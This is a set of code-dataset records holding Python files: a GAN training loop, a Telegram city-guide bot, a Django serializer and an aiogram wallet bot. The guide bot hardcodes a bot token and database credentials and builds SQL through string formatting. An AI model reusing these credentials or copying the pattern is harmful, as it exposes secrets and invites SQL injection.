ts1 = time.time()\n\n t0 = time.time()\n # update discriminator\n mod_p_epoch, exp_p_epoch = update_discrim(discrim_net, optimizer_discrim, discrim_criterion, exp_states, exp_actions, \\\n model_states, model_actions, i_iter, dis_times=3.0, use_gpu=use_gpu, train=True)\n exp_p.append(exp_p_epoch)\n mod_p.append(mod_p_epoch)\n \n # update policy network\n if i_iter > 3 and mod_p[-1] < 0.8:\n update_policy(policy_net, optimizer_policy, discrim_net, discrim_criterion, model_states_var, model_actions_var, i_iter, use_gpu)\n t1 = time.time()\n\n if i_iter % args.log_interval == 0:\n print('{}\\tT_sample {:.4f}\\tT_update {:.4f}\\texp_p {:.3f}\\tmod_p {:.3f}'.format(\n i_iter, ts1-ts0, t1-t0, exp_p[-1], mod_p[-1]))\n \n update = 'append'\n if win_exp_p is None:\n update = None\n win_exp_p = vis.line(X = np.array([i_iter]), \\\n Y = np.column_stack((np.array([exp_p[-1]]), np.array([mod_p[-1]]))), \\\n win = win_exp_p, update = update, \\\n opts=dict(legend=['expert_prob', 'model_prob'], title=\"training curve probs\"))\n\n if args.save_model_interval > 0 and (i_iter) % args.save_model_interval == 0:\n torch.save(policy_net.state_dict(), save_path+'model/policy_step'+str(args.highest)+'_training.pth')\n torch.save(discrim_net.state_dict(), save_path+'model/discrim_step'+str(args.highest)+'_training.pth')\n", "repo_name": "felixykliu/NAOMI", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 14011, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 46, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 9, 
"usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.set_default_tensor_type", "line_number": 22, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 91, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed_all", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 107, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 112, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 113, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 115, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 116, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path", "line_number": 123, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 126, "usage_type": "call"}, {"api_name": "visdom.Visdom", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 169, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 173, "usage_type": "call"}, {"api_name": "time.time", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 220, 
"usage_type": "call"}, {"api_name": "torch.optim", "line_number": 220, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 223, "usage_type": "attribute"}, {"api_name": "torch.nn.BCELoss", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 224, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 253, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 254, "usage_type": "call"}, {"api_name": "time.time", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 279, "usage_type": "call"}, {"api_name": "time.time", "line_number": 282, "usage_type": "call"}, {"api_name": "time.time", "line_number": 284, "usage_type": "call"}, {"api_name": "time.time", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 304, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 309, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 310, "usage_type": "call"}]}
+{"seq_id": "13205084887", "text": "import logging\nfrom telegram.ext import Updater, CommandHandler, CallbackQueryHandler, MessageHandler, Filters\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, CallbackQuery, ReplyKeyboardMarkup, KeyboardButton\nimport telegram\nimport psycopg2\n \n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nUsers_Data = {}\nUsers_Begins = {}\nUsers_Ends = {}\nMarshrs = {}\n\nCities = ['Екатеринбург', 'Нижний Новгород', 'Краснодар', 'Красноярск',\n 'Новосибирск', 'Санкт-Петербург', 'Самара', 'Сочи', 'Уфа']\n\nclass Bott:\n \n def __init__(self,token):\n self.updater = Updater(token = token)\n self.i = 0\n self.begin = 0\n self.end = 10\n self.updater.dispatcher.add_handler(CommandHandler('start', self.start))\n self.updater.dispatcher.add_handler(CallbackQueryHandler(self.btn_handler))\n self.updater.dispatcher.add_handler(CommandHandler('help', self.help))\n self.updater.dispatcher.add_handler(MessageHandler(Filters.all, self.msg_handler))\n self.updater.dispatcher.add_error_handler(self.error)\n \n\n def start_handler(self):\n self.updater.start_polling()\n self.updater.idle()\n \n def start(self, bot ,update):\n self.bot = bot\n self.update = update\n self.marshr = 0\n self.begin = 0\n self.end = 10\n self.update.message.reply_text(\"Hello!\")\n\n self.keyboard = []\n for city in Cities:\n self.keyboard.append([InlineKeyboardButton(city, callback_data=city)])\n \n self.keyboard.append([InlineKeyboardButton(\"Не хочу\", callback_data='Нет')])\n \n self.reply_markup = InlineKeyboardMarkup(self.keyboard)\n update.message.reply_text( 'Здравствуйте! Выберите город, чтоб ознакомиться с достопримечательностями'\n , reply_markup = self.reply_markup)\n \n\n def help(self,bot,update):\n self.update = update\n self.bot = bot\n print(type(update.message))\n self.update.message.reply_text(\"Use /start to test this bot.\")\n\n def error(self, bot, update, error):\n logger.warning('Update \"%s\" caused error \"%s\"', update, error)\n \n def db_connection(self, city):\n try:\n conn = psycopg2.connect(\"dbname='fn1181_2018' user='student' host='195.19.32.74' password='bmstu' port='5432'\")\n except:\n print(\"I am unable to connect to the database\")\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM sight WHERE city = '{}'\".format(city))\n return cursor \n \n \n def updateKeyboard(self, begin, end):\n self.keyboard = []\n if(self.begin < self.end):\n for i in range(self.begin, self.end):\n self.keyboard.append([InlineKeyboardButton(self.data[i][1], callback_data = str(i))])\n self.keyboard.append([InlineKeyboardButton(\"Далее\", callback_data = 'more')])\n if self.begin > 0:\n self.keyboard.append([InlineKeyboardButton(\"Назад\", callback_data = 'назад')])\n else:\n self.keyboard.append([InlineKeyboardButton(\"Заново\", callback_data = 'Заново')])\n self.keyboard.append([InlineKeyboardButton(\"Нет\", callback_data = 'Нет')])\n\n \n def btn_handler(self,bot,update): \n query = update.callback_query\n id = query.message.chat_id\n m_id = query.message.message_id\n if query.data == \"Нет\":\n bot.edit_message_text(text=\"До свидания! 
Хорошего настроения!\",\n chat_id = id,\n message_id = m_id)\n elif query.data in Cities:\n bot.delete_message(chat_id = id, message_id = m_id)\n self.cursor = self.db_connection(query.data)\n \n Users_Data[id] = self.cursor.fetchall()\n Users_Begins[id] = 0\n Users_Ends[id] = 10\n print(\"\\nNew user \" + str(id) + \" pressed: \" + query.data)\n \n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n \n self.updateKeyboard(self.begin,self.end)\n reply_markup = InlineKeyboardMarkup(self.keyboard) \n bot.send_message(chat_id = id, message_id = m_id, text ='Что Вам наиболее интересно?',\n reply_markup = reply_markup, parse_mode = 'Markdown')\n elif query.data == 'more':\n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n \n self.begin += 10\n self.end += 10\n if self.end > len(self.data):\n self.end = len(self.data)\n\n Users_Begins[id] = self.begin\n Users_Ends[id] = self.end\n \n bot.delete_message(chat_id = id, message_id = m_id)\n self.updateKeyboard(self.begin,self.end)\n reply_markup = InlineKeyboardMarkup(self.keyboard)\n if(self.begin < self.end):\n bot.send_message(chat_id = id, message_id = m_id, text ='Что Вам наиболее интересно?',\n reply_markup = reply_markup , parse_mode = 'Markdown')\n else:\n bot.send_message(chat_id = id, message_id = m_id, text ='Достопримечательности закончились. Показать заново?',\n reply_markup = reply_markup, parse_mode = 'Markdown')\n elif query.data == 'назад':\n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n \n if self.end == len(self.data):\n self.end -= len(self.data) % 10\n self.begin -= 10\n else:\n self.begin -= 10\n self.end -= 10\n\n Users_Begins[id] = self.begin\n Users_Ends[id] = self.end\n \n bot.delete_message(chat_id = id, message_id = m_id)\n self.updateKeyboard(self.begin,self.end)\n reply_markup = InlineKeyboardMarkup(self.keyboard)\n if(self.begin < self.end):\n bot.send_message(chat_id = id, message_id = m_id, text ='Что Вам наиболее интересно?',\n reply_markup = reply_markup , parse_mode = 'Markdown')\n elif query.data == 'Заново':\n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n \n self.begin = 0\n self.end = 10\n\n Users_Begins[id] = self.begin\n Users_Ends[id] = self.end\n \n bot.delete_message(chat_id = id, message_id = m_id)\n self.updateKeyboard(self.begin,self.end)\n reply_markup = InlineKeyboardMarkup(self.keyboard)\n if(self.begin < self.end):\n bot.send_message(chat_id = id, message_id = m_id, text ='Что Вам наиболее интересно?',\n reply_markup = reply_markup, parse_mode = 'Markdown')\n elif query.data == 'back':\n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n \n bot.delete_message(chat_id = id, message_id = m_id)\n self.updateKeyboard(self.begin,self.end)\n reply_markup = InlineKeyboardMarkup(self.keyboard) \n bot.send_message(chat_id = id, message_id = m_id, text ='Что Вам наиболее интересно?',\n reply_markup = reply_markup, parse_mode = 'Markdown')\n elif query.data == 'delphoto':\n bot.delete_message(chat_id = id, message_id = m_id)\n elif query.data == 'Маршрут':\n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n self.marshr = Marshrs.get(id)\n long = self.data[self.marshr][7]\n lat = self.data[self.marshr][6]\n bot.send_location(chat_id=id,message_id= m_id,\n longitude = long, latitude=lat) \n else:\n for i 
in range(self.begin, self.end):\n if query.data == str(i):\n self.data = Users_Data.get(id)\n self.begin = Users_Begins.get(id)\n self.end = Users_Ends.get(id)\n \n self.marshr = i\n Marshrs[id] = i\n bot.delete_message(chat_id = id, message_id = m_id)\n keyb = [[InlineKeyboardButton('Закрыть', callback_data = 'delphoto')]]\n reply_markup = InlineKeyboardMarkup(keyb)\n bot.send_photo(chat_id = id, photo = self.data[i][8],\n reply_markup = reply_markup)\n \n self.keyb = [[InlineKeyboardButton('Показать на карте', callback_data = 'Маршрут')],\n [InlineKeyboardButton('Назад', callback_data = 'back')]]\n reply_markup = InlineKeyboardMarkup(self.keyb)\n bot.send_message(chat_id = id, message_id = m_id,\n text =self.data[i][1]+\"\\n\"+\"Адрес: \"+ self.data[i][2]+\"\\n\"+self.data[i][4]+\"\\n\"\n +\"Расписание: \"+ self.data[i][5],\n reply_markup = reply_markup, parse_mode = 'Markdown') \n \n \n \n \n \n\n # Create the Updater and pass it your bot's token.\nbott = Bott('495453959:AAH26CmZCbrHcGv0N60y4sw6cTE_OpUtsGI')\nbott.start_handler()\n\n", "repo_name": "mabmstu/GuideBot", "sub_path": "GuideBot.py", "file_name": "GuideBot.py", "file_ext": "py", "file_size_in_byte": 10357, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 9, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 23, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 27, "usage_type": "call"}, {"api_name": "telegram.ext.CallbackQueryHandler", "line_number": 28, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 29, "usage_type": "call"}, {"api_name": "telegram.ext.MessageHandler", "line_number": 30, "usage_type": "call"}, {"api_name": "telegram.ext.Filters.all", "line_number": 30, "usage_type": "attribute"}, {"api_name": "telegram.ext.Filters", "line_number": 30, "usage_type": "name"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 48, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 50, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 52, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 68, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 80, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 81, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 83, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 85, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 86, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 111, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 129, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 153, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 170, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 181, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 205, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 206, "usage_type": "call"}, {"api_name": 
"telegram.InlineKeyboardButton", "line_number": 210, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 211, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 212, "usage_type": "call"}]}
+{"seq_id": "2251859569", "text": "from rest_framework import serializers\nfrom .models import SudTask\n\n\nclass SudTaskSerializer(serializers.ModelSerializer):\n class Meta:\n model = SudTask\n fields = [\n 'id',\n 'task_id',\n 'team',\n 'is_complete',\n 'complete_date',\n 'created_date',\n 'updated_date',\n ]", "repo_name": "KooHyunJung/DRF-task-system", "sub_path": "sub_task/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 364, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 5, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 5, "usage_type": "name"}, {"api_name": "models.SudTask", "line_number": 7, "usage_type": "name"}]}
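For context, a DRF ModelSerializer like the one above is used by handing it model instances; the queries below are a hypothetical usage sketch, assuming the app package is sub_task as the sub_path suggests:

from sub_task.models import SudTask
from sub_task.serializers import SudTaskSerializer

task = SudTaskSerializer(SudTask.objects.first())             # one saved instance
print(task.data)                                              # dict of the declared fields
tasks = SudTaskSerializer(SudTask.objects.all(), many=True)   # a queryset
print(tasks.data)                                             # list of such dicts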
+{"seq_id": "5509438698", "text": "from aiogram.dispatcher import FSMContext\nimport re\nfrom aiogram.types import Message, CallbackQuery\nfrom bot import dp, bot\nfrom crud.user import check_user, get_name\nfrom crud.wallet import new_wallet, get_all_wallets, get_balance, remove_wallet, get_all_wallets_names\nfrom aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\nfrom states.WalletState import WalletMenuState\nfrom states.UserState import UserState\n\nfrom utils.keyboards.main_menu import wallet_cb\nfrom utils.keyboards.wallet_menu import wallet_menu_kb\nfrom utils.keyboards.main_menu import main_menu_kb\n\n\n@dp.callback_query_handler(wallet_cb.filter(action=\"wallet_start\"), state=\"*\")\nasync def show_wallet_menu(callback: CallbackQuery, callback_data: dict, state: FSMContext):\n    await bot.answer_callback_query(callback.id)\n    await WalletMenuState.idle.set()\n    menu_message_id = callback.message.message_id\n    await bot.edit_message_reply_markup(chat_id=callback.from_user.id, message_id=menu_message_id, reply_markup=wallet_menu_kb)\n\n# Wallet creation\n@dp.callback_query_handler(wallet_cb.filter(action=\"wallet_create\"), state=\"*\")\nasync def cmd_create_wallet(callback: CallbackQuery, callback_data: dict, state: FSMContext):\n    await bot.answer_callback_query(callback.id)\n    user_id = callback.from_user.id\n    if check_user(user_id):\n        await WalletMenuState.create.set()\n        await bot.edit_message_text(chat_id=callback.from_user.id, message_id=callback.message.message_id, text=\"Добавим кошелек, введите название кошелька\")\n    else:\n        await UserState.in_menu.set()  # state setters are coroutines and must be awaited\n        await bot.edit_message_text(chat_id=callback.from_user.id, message_id=callback.message.message_id, text=\"Вы не зарегистрированы\")\n\n\n@dp.message_handler(state=WalletMenuState.create)\nasync def create_wallet(message: Message, state: FSMContext):\n    user_id = message.from_user.id\n    wallets = get_all_wallets_names(user_id)\n    if message.text not in wallets:\n        new_wallet(user_id, message.text)\n        await WalletMenuState.idle.set()\n        await message.answer(f\"Кошелек {message.text} создан\", reply_markup=wallet_menu_kb)\n\n    else:\n        await WalletMenuState.idle.set()\n        await message.answer(\"Такой кошелек уже есть\", reply_markup=wallet_menu_kb)\n\n\n# Getting all wallets\n@dp.callback_query_handler(wallet_cb.filter(action=\"wallet_get_all\"), state=\"*\")\nasync def cmd_get_all_wallets(callback: CallbackQuery, callback_data: dict, state: FSMContext):\n    await bot.answer_callback_query(callback.id)\n    await WalletMenuState.get_all.set()\n    wallets = get_all_wallets(callback.from_user.id)\n    reply_text = \"Ваши кошельки:\"\n    for wallet in wallets:\n        reply_text = reply_text+f\"\\n\\\\- *{wallet['name']}*: {wallet['balance']}\"\n    await bot.edit_message_text(chat_id=callback.from_user.id, message_id=callback.message.message_id, text=reply_text, reply_markup=wallet_menu_kb)\n    await WalletMenuState.idle.set()\n    # await bot.send_message(chat_id=callback.from_user.id, text=\"Меню\", reply_markup=wallet_menu_kb)\n\n\n@dp.message_handler(commands=\"get_balance\")\nasync def cmd_get_balance(message: Message):\n    user_id = message.from_user.id\n    ikb = InlineKeyboardMarkup(row_width=2)\n    if check_user(user_id):\n        user_name = get_name(user_id)\n        user_wallets = get_all_wallets(user_id)\n\n        for wallet in user_wallets:\n\n            ikb.add(InlineKeyboardButton(\n                text=wallet[\"name\"],\n                callback_data=wallet_cb.new(name=wallet[\"name\"], action=\"get_wallet\")\n            ))\n        await message.answer(f\"Привет, {user_name}, выбери кошелек\", reply_markup=ikb)\n    
else:\n await message.answer(f\"Вы не зарегистрированы\")\n\n\n\n@dp.callback_query_handler(wallet_cb.filter(action=\"get_wallet\"))\nasync def get_wallet_balance(callback: CallbackQuery, callback_data: dict):\n await bot.answer_callback_query(callback.id)\n wallet_name = callback_data[\"name\"]\n if get_all_wallets_names(callback.from_user.id):\n balance = get_balance(callback.from_user.id, wallet_name)\n await bot.send_message(chat_id= callback.from_user.id ,text = f'На балансе кошелька {wallet_name} находится {balance}')\n else:\n await bot.send_message(chat_id= callback.from_user.id ,text = f'У тебя нет кошельков воспользуйся командой /create_wallet')\n\n\n#removing wallet\n@dp.callback_query_handler(wallet_cb.filter(action=\"wallet_delete\"), state=\"*\")\nasync def cmd_rmv_wallet(callback: CallbackQuery, callback_data: dict, state: FSMContext):\n user_id = callback.from_user.id\n\n if check_user(user_id):\n user_wallets = get_all_wallets(user_id)\n if user_wallets:\n ikb = InlineKeyboardMarkup(row_width=1)\n await WalletMenuState.remove.set()\n for wallet in user_wallets:\n ikb.add(InlineKeyboardButton(\n text=wallet[\"name\"],\n callback_data=wallet_cb.new(name=wallet[\"name\"], action=\"rmv_wallet\")\n ))\n await bot.edit_message_text(chat_id=user_id, message_id=callback.message.message_id, text=\"Выберите кошелек для удаления\")\n await bot.edit_message_reply_markup(chat_id=user_id, message_id=callback.message.message_id, reply_markup=ikb)\n else:\n await bot.send_message(chat_id=user_id, text=\"У вас нет кошельков\\\\.\", reply_markup=wallet_menu_kb)\n else:\n await bot.send_message(chat_id=user_id, text=\"Вы не зарегистрированы, воспользуйтесь командой /start\")\n\n\n@dp.callback_query_handler(wallet_cb.filter(action=\"rmv_wallet\"), state=\"*\")\nasync def rmv_wallet(callback: CallbackQuery, callback_data: dict):\n await bot.answer_callback_query(callback.id)\n wallet_name = callback_data[\"name\"]\n remove_wallet(callback.from_user.id, wallet_name)\n await WalletMenuState.idle.set()\n await bot.edit_message_text(chat_id=callback.from_user.id, message_id=callback.message.message_id, text=\"Кошелек был удален\\\\.\", reply_markup=wallet_menu_kb)\n\n\n@dp.callback_query_handler(wallet_cb.filter(action=\"wallet_go_back\"), state=\"*\")\nasync def wallet_go_back(callback: CallbackQuery, callback_data: dict):\n await UserState.in_menu.set()\n await bot.edit_message_text(chat_id=callback.from_user.id, message_id=callback.message.message_id, text=\"Меню\", reply_markup=main_menu_kb)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "aryzhykau/spendings-api", "sub_path": "handlers/wallet.py", "file_name": "wallet.py", "file_ext": "py", "file_size_in_byte": 6620, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "aiogram.types.CallbackQuery", "line_number": 17, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 17, "usage_type": "name"}, {"api_name": "bot.bot.answer_callback_query", "line_number": 18, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 18, "usage_type": "name"}, {"api_name": "states.WalletState.WalletMenuState.idle.set", "line_number": 19, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle", "line_number": 19, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 19, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_reply_markup", "line_number": 21, "usage_type": "call"}, 
{"api_name": "bot.bot", "line_number": 21, "usage_type": "name"}, {"api_name": "utils.keyboards.wallet_menu.wallet_menu_kb", "line_number": 21, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 16, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 16, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 16, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 25, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 25, "usage_type": "name"}, {"api_name": "bot.bot.answer_callback_query", "line_number": 26, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 26, "usage_type": "name"}, {"api_name": "crud.user.check_user", "line_number": 28, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.create.set", "line_number": 29, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.create", "line_number": 29, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 29, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_text", "line_number": 30, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 30, "usage_type": "name"}, {"api_name": "states.UserState.UserState.in_menu.set", "line_number": 32, "usage_type": "call"}, {"api_name": "states.UserState.UserState.in_menu", "line_number": 32, "usage_type": "attribute"}, {"api_name": "states.UserState.UserState", "line_number": 32, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_text", "line_number": 33, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 33, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 24, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 24, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 24, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 37, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 37, "usage_type": "name"}, {"api_name": "crud.wallet.get_all_wallets_names", "line_number": 39, "usage_type": "call"}, {"api_name": "crud.wallet.new_wallet", "line_number": 41, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle.set", "line_number": 42, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle", "line_number": 42, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 42, "usage_type": "name"}, {"api_name": "utils.keyboards.wallet_menu.wallet_menu_kb", "line_number": 43, "usage_type": "name"}, {"api_name": "states.WalletState.WalletMenuState.idle.set", "line_number": 46, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle", "line_number": 46, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 46, "usage_type": "name"}, {"api_name": "utils.keyboards.wallet_menu.wallet_menu_kb", "line_number": 47, "usage_type": "name"}, {"api_name": "bot.dp.message_handler", "line_number": 36, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 36, "usage_type": "name"}, {"api_name": "states.WalletState.WalletMenuState.create", "line_number": 36, "usage_type": "attribute"}, {"api_name": 
"states.WalletState.WalletMenuState", "line_number": 36, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 52, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 52, "usage_type": "name"}, {"api_name": "bot.bot.answer_callback_query", "line_number": 53, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 53, "usage_type": "name"}, {"api_name": "states.WalletState.WalletMenuState.get_all.set", "line_number": 54, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.get_all", "line_number": 54, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 54, "usage_type": "name"}, {"api_name": "crud.wallet.get_all_wallets", "line_number": 55, "usage_type": "call"}, {"api_name": "bot.bot.edit_message_text", "line_number": 59, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 59, "usage_type": "name"}, {"api_name": "utils.keyboards.wallet_menu.wallet_menu_kb", "line_number": 59, "usage_type": "name"}, {"api_name": "states.WalletState.WalletMenuState.idle.set", "line_number": 60, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle", "line_number": 60, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 60, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 51, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 51, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 51, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 51, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 70, "usage_type": "name"}, {"api_name": 